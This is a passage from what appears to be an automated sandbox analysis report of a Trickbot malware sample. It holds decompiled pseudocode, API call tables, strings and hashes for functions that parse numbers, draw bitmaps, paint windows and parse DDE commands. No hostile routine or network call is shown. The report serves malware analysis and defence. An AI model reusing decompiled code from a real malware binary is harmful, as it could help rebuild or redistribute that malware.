								if(__eax == 0) {
									break;
								}
								__ecx = __bl;
								_t66 = (__esi + __esi * 4) * 2; // -44
								__esi = __ecx + _t66 - 0x30;
								__eflags = __esi - 0x1450;
								if(__esi > 0x1450) {
									__esi = 0x1451;
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							_v32 = __esi;
							while(1) {
								__eflags =  *0x44864c - 1;
								if( *0x44864c <= 1) {
									__ecx =  *0x448440; // 0x44844a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E00409B5F(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							L109:
							_t148 = _t148 - 1;
							goto L111;
						case 0xa:
							goto L92;
						case 0xb:
							__eflags = _a28;
							if(_a28 == 0) {
								_push(0xa);
								__edi = __edi - 1;
								__eflags = __edi;
								_pop(__eax);
								goto L92;
							}
							__eax = __bl;
							_t55 = __edi - 1; // 0x1
							__ecx = _t55;
							__eax = __bl - 0x2b;
							__eflags = __eax;
							_a12 = __ecx;
							if(__eax == 0) {
								L89:
								_push(7);
								L90:
								_pop(_t121);
								goto L7;
							}
							__eax = __eax - 1;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								L110:
								__edi = __ecx;
								L111:
								__eflags = _v20;
								 *_a8 = _t148;
								if(_v20 == 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									_v24 = 4;
									L138:
									_t144 = _a4;
									_t124 = _t123 | _v44;
									__eflags = _t124;
									_t144[1] = _t150;
									_t144[0] = _t142;
									_t144[2] = _t124;
									 *_t144 = _t147;
									return _v24;
								}
								_push(0x18);
								_pop(_t126);
								__eflags = _v8 - _t126;
								if(_v8 <= _t126) {
									_t127 = _v16;
								} else {
									__eflags = _v73 - 5;
									if(_v73 >= 5) {
										_t75 =  &_v73;
										 *_t75 = _v73 + 1;
										__eflags =  *_t75;
									}
									_v8 = _t126;
									_t127 = _v16 - 1;
									_v12 = _v12 + 1;
								}
								__eflags = _v8;
								if(_v8 <= 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									goto L129;
								} else {
									while(1) {
										_t127 = _t127 - 1;
										__eflags =  *_t127;
										if( *_t127 != 0) {
											break;
										}
										_v8 = _v8 - 1;
										_v12 = _v12 + 1;
									}
									E0040C37B(_t148,  &_v96, _v8,  &_v68);
									_t131 = _v32;
									__eflags = _v28;
									if(_v28 < 0) {
										_t131 =  ~_t131;
									}
									_t132 = _t131 + _v12;
									__eflags = _v36;
									if(_v36 == 0) {
										_t132 = _t132 + _a20;
										__eflags = _t132;
									}
									__eflags = _v40;
									if(_v40 == 0) {
										_t132 = _t132 - _a24;
										__eflags = _t132;
									}
									__eflags = _t132 - 0x1450;
									if(_t132 <= 0x1450) {
										__eflags = _t132 - 0xffffebb0;
										if(_t132 >= 0xffffebb0) {
											E0040D2A1( &_v68, _t132, _a16);
											_t147 = _v68;
											_t142 = _v66;
											_t150 = _v62;
											_t123 = _v58;
											goto L129;
										}
										_v52 = 1;
										goto L128;
									} else {
										_v48 = 1;
										L128:
										_t142 = _a12;
										_t150 = _a12;
										_t123 = _a12;
										_t147 = _a12;
										L129:
										__eflags = _v48;
										if(_v48 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												_t147 = 0;
												_t123 = 0;
												_t150 = 0;
												_t142 = 0;
												__eflags = 0;
												_v24 = 1;
											}
										} else {
											_t142 = 0;
											_t123 = 0x7fff;
											_t150 = 0x80000000;
											_t147 = 0;
											_v24 = 2;
										}
										goto L138;
									}
								}
							}
							L88:
							_v28 = _v28 | 0xffffffff;
							_push(7);
							_pop(__eax);
							goto L7;
					}
				}
				L92:
				if(_t121 == 0xa) {
					goto L111;
				}
				goto L7;
			}

0x0040c44b
0x0040c453
0x0040c456
0x0040c458
0x0040c459
0x0040c45c
0x0040c45f
0x0040c462
0x0040c465
0x0040c468
0x0040c46b
0x0040c46e
0x0040c471
0x0040c474
0x0040c477
0x0040c47a
0x0040c47d
0x0040c47d
0x0040c482
0x0040c493
0x00000000
0x0040c493
0x0040c496
0x0040c499
0x0040c499
0x0040c499
0x0040c49b
0x0040c49f
0x00000000
0x00000000
0x0040c4a5
0x00000000
0x0040c4ac
0x0040c4af
0x0040c4bd
0x0040c4bd
0x0040c4c3
0x0040c4cf
0x0040c4cf
0x0040c4d2
0x0040c4f2
0x0040c4f6
0x0040c4f8
0x00000000
0x0040c4f8
0x0040c4d5
0x0040c4d5
0x0040c4d6
0x0040c4e6
0x0040c4e8
0x0040c4ef
0x00000000
0x0040c4ef
0x0040c4d8
0x0040c4db
0x00000000
0x00000000
0x00000000
0x0040c4e1
0x00000000
0x0040c4c3
0x0040c4b1
0x0040c4b4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c4fb
0x0040c4fe
0x0040c501
0x0040c508
0x0040c508
0x0040c50e
0x00000000
0x00000000
0x0040c514
0x0040c517
0x00000000
0x00000000
0x0040c519
0x0040c51c
0x00000000
0x00000000
0x0040c51e
0x0040c521
0x00000000
0x00000000
0x00000000
0x0040c521
0x0040c503
0x0040c506
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c552
0x0040c555
0x0040c560
0x0040c560
0x0040c566
0x0040c4c5
0x0040c4c5
0x00000000
0x0040c4c5
0x0040c56c
0x0040c56f
0x00000000
0x00000000
0x0040c575
0x0040c575
0x00000000
0x0040c575
0x0040c557
0x0040c55a
0x0040c4b6
0x0040c4b6
0x00000000
0x0040c4b6
0x00000000
0x00000000
0x0040c57c
0x0040c57f
0x0040c57f
0x0040c585
0x0040c598
0x0040c59e
0x0040c5a4
0x0040c5a4
0x0040c587
0x0040c587
0x0040c58c
0x0040c591
0x0040c592
0x0040c593
0x0040c595
0x0040c595
0x0040c5a6
0x0040c5a8
0x00000000
0x00000000
0x0040c5aa
0x0040c5ae
0x0040c5c0
0x0040c5c0
0x0040c5c0
0x0040c5b0
0x0040c5b0
0x0040c5b3
0x0040c5b6
0x0040c5b9
0x0040c5bc
0x0040c5bc
0x0040c5c3
0x0040c5c5
0x0040c5c5
0x0040c5c8
0x0040c5ce
0x00000000
0x00000000
0x0040c5d0
0x0040c5d0
0x00000000
0x00000000
0x0040c5d7
0x0040c5db
0x0040c5de
0x0040c5e1
0x0040c5f0
0x0040c5f0
0x0040c5f0
0x0040c5f6
0x0040c609
0x0040c60f
0x0040c615
0x0040c615
0x0040c5f8
0x0040c5f8
0x0040c5fd
0x0040c602
0x0040c603
0x0040c604
0x0040c606
0x0040c606
0x0040c617
0x0040c619
0x00000000
0x00000000
0x0040c61b
0x0040c61f
0x0040c621
0x0040c624
0x0040c627
0x0040c62a
0x0040c62d
0x0040c62d
0x0040c62d
0x0040c630
0x0040c630
0x0040c632
0x0040c634
0x0040c634
0x0040c637
0x0040c637
0x0040c63a
0x0040c54a
0x0040c54a
0x0040c54b
0x00000000
0x0040c54b
0x0040c640
0x0040c643
0x00000000
0x00000000
0x0040c523
0x0040c523
0x0040c526
0x00000000
0x00000000
0x0040c52c
0x0040c52f
0x0040c543
0x0040c543
0x00000000
0x0040c543
0x0040c531
0x0040c534
0x00000000
0x00000000
0x0040c53a
0x0040c53d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c5e3
0x0040c5e3
0x0040c5e3
0x0040c5e6
0x00000000
0x00000000
0x0040c5e8
0x0040c5eb
0x0040c5ed
0x0040c5ed
0x00000000
0x00000000
0x0040c64e
0x0040c654
0x0040c657
0x0040c66a
0x0040c670
0x0040c676
0x0040c676
0x0040c659
0x0040c659
0x0040c65e
0x0040c663
0x0040c664
0x0040c665
0x0040c667
0x0040c667
0x0040c678
0x0040c67a
0x00000000
0x0040c680
0x0040c680
0x00000000
0x0040c680
0x00000000
0x0040c684
0x0040c684
0x0040c687
0x0040c68a
0x0040c68d
0x0040c694
0x0040c694
0x0040c697
0x0040c697
0x0040c69a
0x00000000
0x00000000
0x0040c69c
0x0040c69d
0x0040c69d
0x0040c69e
0x00000000
0x00000000
0x0040c6a0
0x0040c6a0
0x0040c6a3
0x00000000
0x00000000
0x00000000
0x0040c6a3
0x0040c68f
0x0040c692
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c6ce
0x0040c6d1
0x0040c6e1
0x0040c6e1
0x0040c6e4
0x0040c72a
0x0040c72a
0x00000000
0x0040c72a
0x0040c6a9
0x0040c6a9
0x00000000
0x0040c6a9
0x0040c6d3
0x0040c6d6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c6ad
0x0040c6b0
0x0040c6b0
0x0040c6b3
0x00000000
0x00000000
0x0040c6b5
0x0040c6b7
0x0040c6b7
0x0040c6ba
0x0040c6bd
0x00000000
0x00000000
0x0040c6c3
0x0040c6c6
0x00000000
0x00000000
0x0040c6d8
0x0040c6d8
0x0040c6da
0x0040c6da
0x0040c6db
0x0040c6db
0x00000000
0x00000000
0x0040c732
0x0040c739
0x0040c739
0x0040c73b
0x0040c73b
0x0040c742
0x0040c753
0x0040c759
0x0040c75f
0x0040c75f
0x0040c744
0x0040c744
0x0040c74a
0x0040c74f
0x0040c750
0x0040c750
0x0040c762
0x0040c764
0x00000000
0x00000000
0x0040c766
0x0040c76c
0x0040c76c
0x0040c770
0x0040c776
0x0040c77d
0x00000000
0x0040c77d
0x0040c778
0x0040c77a
0x0040c77a
0x0040c782
0x0040c785
0x0040c785
0x0040c78c
0x0040c79d
0x0040c7a3
0x0040c7a9
0x0040c7a9
0x0040c78e
0x0040c78e
0x0040c794
0x0040c799
0x0040c79a
0x0040c79a
0x0040c7ac
0x0040c7ae
0x00000000
0x00000000
0x0040c7b0
0x0040c7b2
0x0040c7b2
0x0040c7b5
0x0040c7b5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c6e8
0x0040c6ec
0x0040c718
0x0040c71a
0x0040c71a
0x0040c71b
0x00000000
0x0040c71b
0x0040c6ee
0x0040c6f1
0x0040c6f1
0x0040c6f4
0x0040c6f4
0x0040c6f7
0x0040c6fa
0x0040c710
0x0040c710
0x0040c712
0x0040c712
0x00000000
0x0040c712
0x0040c6fc
0x0040c6fd
0x0040c6fd
0x0040c6fe
0x0040c7b8
0x0040c7b8
0x0040c7ba
0x0040c7bd
0x0040c7c1
0x0040c7c3
0x0040c8a2
0x0040c8a4
0x0040c8a6
0x0040c8a8
0x0040c8aa
0x0040c8c8
0x0040c8c8
0x0040c8cb
0x0040c8cb
0x0040c8cf
0x0040c8d2
0x0040c8d5
0x0040c8dd
0x0040c8e2
0x0040c8e2
0x0040c7c9
0x0040c7cb
0x0040c7cc
0x0040c7cf
0x0040c7e6
0x0040c7d1
0x0040c7d1
0x0040c7d5
0x0040c7d7
0x0040c7d7
0x0040c7d7
0x0040c7d7
0x0040c7da
0x0040c7e0
0x0040c7e1
0x0040c7e1
0x0040c7e9
0x0040c7ed
0x0040c898
0x0040c89a
0x0040c89c
0x0040c89e
0x00000000
0x0040c7f3
0x0040c7f3
0x0040c7f3
0x0040c7f4
0x0040c7f7
0x00000000
0x00000000
0x0040c7f9
0x0040c7fc
0x0040c7fc
0x0040c80c
0x0040c811
0x0040c819
0x0040c81c
0x0040c81e
0x0040c81e
0x0040c820
0x0040c823
0x0040c826
0x0040c828
0x0040c828
0x0040c828
0x0040c82b
0x0040c82e
0x0040c830
0x0040c830
0x0040c830
0x0040c833
0x0040c838
0x0040c86a
0x0040c86f
0x0040c882
0x0040c887
0x0040c88a
0x0040c88d
0x0040c890
0x00000000
0x0040c893
0x0040c871
0x00000000
0x0040c83a
0x0040c83a
0x0040c841
0x0040c841
0x0040c844
0x0040c847
0x0040c84a
0x0040c84d
0x0040c84d
0x0040c851
0x0040c8b3
0x0040c8b7
0x0040c8b9
0x0040c8bb
0x0040c8bd
0x0040c8bf
0x0040c8bf
0x0040c8c1
0x0040c8c1
0x0040c853
0x0040c853
0x0040c855
0x0040c85a
0x0040c85f
0x0040c861
0x0040c861
0x00000000
0x0040c851
0x0040c838
0x0040c7ed
0x0040c704
0x0040c704
0x0040c708
0x0040c70a
0x00000000
0x00000000
0x0040c4a5
0x0040c71c
0x0040c71f
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 0040C6B0
9, xrefs: 0040C6C3
0, xrefs: 0040C51E
0, xrefs: 0040C5E3
9, xrefs: 0040C68F
+, xrefs: 0040C514
C, xrefs: 0040C523
9, xrefs: 0040C503
c, xrefs: 0040C531
+, xrefs: 0040C637
-, xrefs: 0040C640
1, xrefs: 0040C6BA
0, xrefs: 0040C56C
9, xrefs: 0040C4B1
9, xrefs: 0040C557
1, xrefs: 0040C687
9, xrefs: 0040C6D3
e, xrefs: 0040C53A
-, xrefs: 0040C519
0, xrefs: 0040C6E1
E, xrefs: 0040C52C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID:
String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
API String ID: 0-1157002505
Opcode ID: 635dc67f470208677568e49c00176d163a581d78d328174a98605d98462ba57d
Instruction ID: ecd19a9f7ff05c4cbeb3f3fee7b22305a3c388e17ab9b6ff34084ad045ef0eeb
Opcode Fuzzy Hash: 635dc67f470208677568e49c00176d163a581d78d328174a98605d98462ba57d
Instruction Fuzzy Hash: 22E1DD7194021ADEEB248F68C8957BE7BB1BB04304F28423BD401B72D2D77D99829B1D

Uniqueness

Uniqueness Score: -1.00%

Function 004233B8, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004233B8(int _a4, int _a8, struct HDC__* _a12) {
				int* _v8;
				intOrPtr* _v12;
				void* _v16;
				void* _t37;
				signed int _t42;
				struct HDC__* _t49;
				struct HBITMAP__* _t50;
				intOrPtr* _t60;
				int* _t61;
				int _t66;
				signed int _t69;
				intOrPtr* _t74;
				signed int _t77;
				signed int* _t82;
				int _t83;
				struct HDC__* _t84;
				intOrPtr* _t85;

				_t37 = LoadResource(_a4, _a8);
				if(_t37 == 0) {
					L3:
					return 0;
				}
				_t60 = LockResource(_t37);
				_v12 = _t60;
				if(_t60 == 0) {
					goto L3;
				}
				_t80 =  *_t60 + 0x40;
				_t85 = E0040511B( *_t60 + 0x40);
				if(_t85 != 0) {
					E00405400(_t85, _t60, _t80);
					_t82 = _t85 +  *_t85;
					_a8 = 0x10;
					do {
						_t42 =  *_t82;
						_t69 = 0;
						_t74 = 0x43c5b8;
						while(_t42 !=  *_t74) {
							_t74 = _t74 + 8;
							_t69 = _t69 + 1;
							if(_t74 < "DllGetVersion") {
								continue;
							}
							goto L13;
						}
						if(_a12 == 0) {
							_t61 = 0x43c5bc + _t69 * 8;
							_v8 = _t61;
							GetSysColor( *(0x43c5bc + _t69 * 8));
							GetSysColor( *_t61);
							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
						} else {
							if( *(0x43c5bc + _t69 * 8) != 0x12) {
								 *_t82 = 0xffffff;
							}
						}
						L13:
						_t82 =  &(_t82[1]);
						_t14 =  &_a8;
						 *_t14 = _a8 - 1;
					} while ( *_t14 != 0);
					_t83 =  *(_t85 + 4);
					_t66 =  *(_t85 + 8);
					_a4 = _t83;
					_a8 = _t66;
					_t49 = GetDC(0);
					_a12 = _t49;
					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
					_v8 = _t50;
					if(_t50 != 0) {
						_t84 = CreateCompatibleDC(_a12);
						_v16 = SelectObject(_t84, _v8);
						_push(0xcc0020);
						_push(0);
						_push(_t85);
						_t77 = 1;
						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
						SelectObject(_t84, _v16);
						DeleteDC(_t84);
					}
					ReleaseDC(0, _a12);
					E004053B8(_t85);
					return _v8;
				}
				goto L3;
			}

0x004233c7
0x004233cf
0x004233f3
0x00000000
0x004233f3
0x004233d8
0x004233dc
0x004233df
0x00000000
0x00000000
0x004233e3
0x004233ec
0x004233f1
0x004233fd
0x00423407
0x00423409
0x00423410
0x00423410
0x00423412
0x00423414
0x00423419
0x0042341d
0x00423420
0x00423427
0x00000000
0x00000000
0x00000000
0x00423429
0x0042342f
0x0042344a
0x00423451
0x00423454
0x00423462
0x00423480
0x00423431
0x00423439
0x0042343b
0x0042343b
0x00423439
0x00423482
0x00423482
0x00423485
0x00423485
0x00423485
0x0042348a
0x0042348d
0x00423492
0x00423495
0x00423498
0x004234a1
0x004234a4
0x004234ac
0x004234af
0x004234c3
0x004234cb
0x004234d0
0x004234d5
0x004234d6
0x004234d9
0x004234f5
0x004234ff
0x00423502
0x00423502
0x0042350d
0x00423514
0x00000000
0x0042351c
0x00000000

APIs

LoadResource.KERNEL32(?,?), ref: 004233C7
LockResource.KERNEL32(00000000), ref: 004233D2
GetSysColor.USER32 ref: 00423454
GetSysColor.USER32(00000000), ref: 00423462
GetSysColor.USER32(?), ref: 00423472
GetDC.USER32(00000000), ref: 00423498
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004234A4
CreateCompatibleDC.GDI32(00000000), ref: 004234B4
SelectObject.GDI32(00000000,?), ref: 004234C6
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 004234F5
SelectObject.GDI32(00000000,00000000), ref: 004234FF
DeleteDC.GDI32(00000000), ref: 00423502
ReleaseDC.USER32(00000000,00000000), ref: 0042350D

Strings

DllGetVersion, xrefs: 00423421

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
String ID: DllGetVersion
API String ID: 257281507-2861820592
Opcode ID: 902ce2d935a2a3b9f110c8f414446d6c8568507f20db40b5eda5495fdca7215f
Instruction ID: 2ec7071b640d1559f0c94d3d0ada326af706184f52b3cd5639a974a90c0fd889
Opcode Fuzzy Hash: 902ce2d935a2a3b9f110c8f414446d6c8568507f20db40b5eda5495fdca7215f
Instruction Fuzzy Hash: 3C41F472600215FFDB119F64EC84AAF3BB9FF48315B50806AF90597260C778AE11DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00411340, Relevance: 19.7, APIs: 13, Instructions: 220
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00411340(struct HWND__* _a4, int _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				struct tagRECT _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				_Unknown_base(*)()* _t71;
				long _t73;
				signed int _t74;
				signed int _t77;
				void* _t80;
				void* _t90;
				intOrPtr* _t91;
				signed int _t112;
				intOrPtr _t118;
				signed int _t119;
				intOrPtr _t123;
				void* _t124;
				intOrPtr _t125;
				void* _t134;
				intOrPtr* _t135;
				intOrPtr* _t141;
				intOrPtr* _t148;
				struct HDC__* _t151;
				struct HWND__* _t152;
				void** _t161;

				_t156 =  &_v60;
				if(_a20 == 0) {
					_t152 = _a4;
					_t71 = E00410610(__eflags, _t152, 6);
					_t156 =  &(( &_v60)[2]);
				} else {
					_t71 = 0;
					_t152 = _a4;
				}
				_push(_a16);
				if(_t71 == 0) {
					_t73 = DefWindowProcA(_t152, _a8, _a12, ??);
				} else {
					_t73 = CallWindowProcA(_t71, _t152, _a8, _a12);
				}
				_v60 = _t73;
				if( *0x44d340 != 0) {
					_t74 = IsIconic(_t152);
					__eflags = _t74;
					if(_t74 == 0) {
						_v56 = 1;
						SendMessageA(_t152, 0x11ef, 0,  &_v56);
						_t77 = GetWindowLongA(_t152, 0xfffffff0);
						__eflags = _v56;
						if(_v56 != 0) {
							__eflags = (_t77 & 0x10400080) - 0x10400080;
							if((_t77 & 0x10400080) == 0x10400080) {
								_t123 =  *0x44de38; // 0x0
								_t80 = (_t77 & 0x00c00000) - 0xc00000;
								__eflags = _t80 - 1;
								asm("sbb ebp, ebp");
								__eflags = GetWindowLongA - 1;
								asm("sbb eax, eax");
								_t124 = _t123 - _t80 + 1;
								_t151 = GetWindowDC(_t152);
								GetWindowRect(_t152,  &_v48);
								_v48.right.left = _v48.right.left - _v48.left;
								_push(0xf);
								_push(7);
								_v48.bottom = _v48.bottom - _v48.top;
								_v48.top = 0;
								_v48.left = 0;
								E00410920(_t151,  &_v48, 2);
								InflateRect( &_v48, 0xffffffff, 0xffffffff);
								_push(0xf);
								_push(2);
								E00410920(_t151,  &_v48, 0);
								InflateRect( &_v48, 0xffffffff, 0xffffffff);
								_t134 =  *0x44d388; // 0x0
								_t90 = SelectObject(_t151, _t134);
								_t135 =  &(_v48.right);
								_v60 = _t90;
								_t91 =  &_v56;
								 *_t135 =  *_t91;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t91 + 4));
								 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t91 + 8));
								 *((intOrPtr*)(_t135 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
								_v32 = _v56 +  *0x44de34;
								E004108F0(_t151, _t135);
								OffsetRect( &(_v48.right), _v48.left - _v56 -  *0x44de34, 0);
								E004108F0(_t151,  &(_v48.right));
								_v48.right.left = _v56 +  *0x44de34;
								_v32 = _v48.left -  *0x44de34;
								_v28 = _v48.bottom + _t124;
								E004108F0(_t151,  &(_v48.right));
								_t161 =  &(_t156[0x10]);
								__eflags =  ~GetWindowLongA;
								if( ~GetWindowLongA != 0) {
									_t148 =  &(_v48.right);
									_t141 =  &_v24;
									_t125 = _t124 + _v48.bottom;
									 *_t141 =  *_t148;
									 *((intOrPtr*)(_t141 + 4)) = _v48.bottom;
									 *((intOrPtr*)(_t141 + 8)) =  *((intOrPtr*)(_t148 + 8));
									_t118 =  *0x44de3c; // 0x0
									_push(0xf);
									_t119 = _t118 + _t125;
									__eflags = _t119;
									_push(0);
									 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t148 + 0xc));
									_v20 = _t125;
									_v12 = _t119;
									E00410920(_t151,  &_v24, 2);
									_t161 =  &(_t161[5]);
								}
								_v48.bottom = _v48.bottom + _v48.top - _v52 -  *0x44de34;
								_t112 = _v48.bottom +  *0x44de38;
								__eflags = _t112;
								_v28 = _t112;
								E004108F0(_t151,  &(_v48.right));
								SelectObject(_t151, _v60);
								ReleaseDC(_t152, _t151);
							}
						}
						return _v60;
					} else {
						return _v60;
					}
				} else {
					return _v60;
				}
			}

0x00411340
0x0041134c
0x00411356
0x0041135d
0x00411362
0x0041134e
0x0041134e
0x00411350
0x00411350
0x0041136b
0x0041136c
0x0041138d
0x0041136e
0x0041137a
0x0041137a
0x0041139a
0x0041139e
0x004113af
0x004113b5
0x004113b7
0x004113c7
0x004113dc
0x004113eb
0x004113ed
0x004113f2
0x00411400
0x00411406
0x00411411
0x00411417
0x0041141c
0x00411420
0x00411424
0x00411427
0x0041142a
0x00411432
0x0041143a
0x00411448
0x0041144c
0x00411452
0x00411454
0x0041145a
0x00411462
0x0041146c
0x0041147d
0x00411487
0x00411489
0x0041148f
0x004114a0
0x004114a6
0x004114ae
0x004114b4
0x004114b8
0x004114bc
0x004114c2
0x004114c7
0x004114d2
0x004114d5
0x004114e2
0x004114e6
0x00411504
0x00411510
0x00411522
0x00411534
0x00411540
0x00411544
0x00411549
0x0041154c
0x0041154e
0x00411554
0x00411558
0x0041155e
0x00411562
0x00411567
0x0041156d
0x00411570
0x00411575
0x00411577
0x00411577
0x00411579
0x0041157d
0x00411584
0x00411588
0x0041158e
0x00411593
0x00411593
0x004115aa
0x004115b2
0x004115b2
0x004115b8
0x004115bc
0x004115ca
0x004115d2
0x004115d2
0x00411406
0x004115e3
0x004113b9
0x004113c4
0x004113c4
0x004113a0
0x004113ab
0x004113ab

APIs

CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 0041137A
DefWindowProcA.USER32(00000000,?,?,?), ref: 0041138D
IsIconic.USER32(00000000), ref: 004113AF
SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 004113DC
GetWindowLongA.USER32(00000000,000000F0), ref: 004113EB
GetWindowDC.USER32(00000000), ref: 0041142C
GetWindowRect.USER32(00000000,?), ref: 0041143A
InflateRect.USER32(?,000000FF,000000FF), ref: 0041147D
InflateRect.USER32(?,000000FF,000000FF), ref: 004114A0
SelectObject.GDI32(00000000,00000000), ref: 004114AE
OffsetRect.USER32(?,?,00000000), ref: 00411504

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
String ID:
API String ID: 2215177122-0
Opcode ID: 93536037d1395f4a783766876f9f4efa81ae9954d3b0669e01a76332c1226e0a
Instruction ID: dc7fba4716d261272d590228d8666108f7e23948903850164cd81d0d98365c81
Opcode Fuzzy Hash: 93536037d1395f4a783766876f9f4efa81ae9954d3b0669e01a76332c1226e0a
Instruction Fuzzy Hash: 0681AD71608300AFD300CF68DC85E6BB7E4FB89318F144A2DF99987291D7B5E946CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0042AFA7, Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 485
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0042AFA7(intOrPtr __ecx, void* __eflags) {
				signed int _t209;
				signed int _t214;
				signed int _t219;
				signed int _t226;
				void* _t228;
				void* _t233;
				void* _t240;
				intOrPtr _t244;
				void* _t248;
				void* _t249;
				void* _t260;
				signed int _t261;
				void* _t262;
				signed int _t273;
				void* _t279;
				void* _t284;
				void* _t291;
				signed int _t297;
				void* _t303;
				void* _t308;
				void* _t315;
				signed int _t321;
				void* _t327;
				void* _t332;
				signed int _t337;
				void* _t339;
				signed int _t346;
				signed int _t349;
				void* _t351;
				signed int _t354;
				void* _t359;
				void* _t368;
				void* _t374;
				signed int _t387;
				intOrPtr* _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				void* _t415;
				signed int _t482;
				signed int _t486;
				void* _t488;
				void* _t491;
				intOrPtr _t492;
				void* _t494;

				E00405340(E00438A0C, _t494);
				 *((intOrPtr*)(_t494 - 0x14)) = __ecx;
				E00417F36(_t494 + 8, _t494,  *((intOrPtr*)(_t494 + 8)));
				_t486 = 0;
				 *(_t494 - 4) = 0;
				E00431711(_t494 - 0x40);
				_t482 = 4;
				_push(7);
				_push(_t494 - 0x18);
				 *(_t494 - 4) = 1;
				 *(_t494 - 0x30) = _t482;
				_t209 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), "[open(\"");
				asm("sbb bl, bl");
				E00417EC8(_t494 - 0x18);
				if( ~_t209 + 1 == 0) {
					_push(8);
					_push(_t494 - 0x18);
					_t214 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), "[print(\"");
					asm("sbb bl, bl");
					E00417EC8(_t494 - 0x18);
					__eflags =  ~_t214 + 1;
					if( ~_t214 + 1 == 0) {
						_push(0xa);
						_push(_t494 - 0x18);
						_t219 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), "[printto(\"");
						asm("sbb bl, bl");
						E00417EC8(_t494 - 0x18);
						__eflags =  ~_t219 + 1;
						if(__eflags == 0) {
							L34:
							 *(_t494 - 4) =  *(_t494 - 4) & 0x00000000;
							E0043176C(_t494 - 0x40, _t501);
							 *(_t494 - 4) =  *(_t494 - 4) | 0xffffffff;
							E00417EC8(_t494 + 8);
							 *[fs:0x0] =  *((intOrPtr*)(_t494 - 0xc));
							return _t486;
						}
						 *(_t494 - 0x30) = 3;
						_t226 =  *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffff6;
						__eflags = _t226;
						_push(_t226);
						_push(_t494 - 0x18);
						_t228 = E004151D0(_t494 + 8);
						 *(_t494 - 4) = 4;
